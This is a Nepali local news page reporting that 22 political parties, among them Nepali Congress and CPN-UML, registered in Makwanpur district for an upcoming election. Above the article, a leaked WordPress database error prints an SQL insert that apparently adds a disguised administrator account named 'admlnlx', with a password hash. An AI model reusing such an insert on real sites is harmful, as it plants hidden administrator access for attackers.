WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B/0GV.3CP2KviGGGLa3jZ66K1gBfum1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 02:03:51', '', 'admlnlx', 'admlnlx')
हेटौँडा,माघ १९ –
मकवानपुर जिल्लामा २२ वटा दल दर्ता भएका छन् । निर्वाचन आयोगले गत पौष २५ गते सूचना प्रकाशन गरि माघ १७ गतेभित्र दल दर्ताको लागि आग्रह गरेपछि मकवानपुरका २२ दलहरु दर्ता भएका हुन् ।
जिल्ला निर्वाचन कार्यालय मकवानपुरका प्रमुख गोविन्द प्रस्ताद पौडेलको अनुसार अब हुने निर्वाचनमा मकवानपुरका २२ दलहरुले सहभागिता जनाउन पाउने भएका छन् । मकवानपुरमा दर्ता हुने दलहरुमा नेपाली कांग्रेस, नेकपा एमाले, माओवादी केन्द्र, राप्रपा,संघिय समाजवादी फोरम नेपाल, राष्ट्रिय जनमोर्चा, नेकपा माले, नयाँ शक्ति नेपाल लगाएतको रहेको छ ।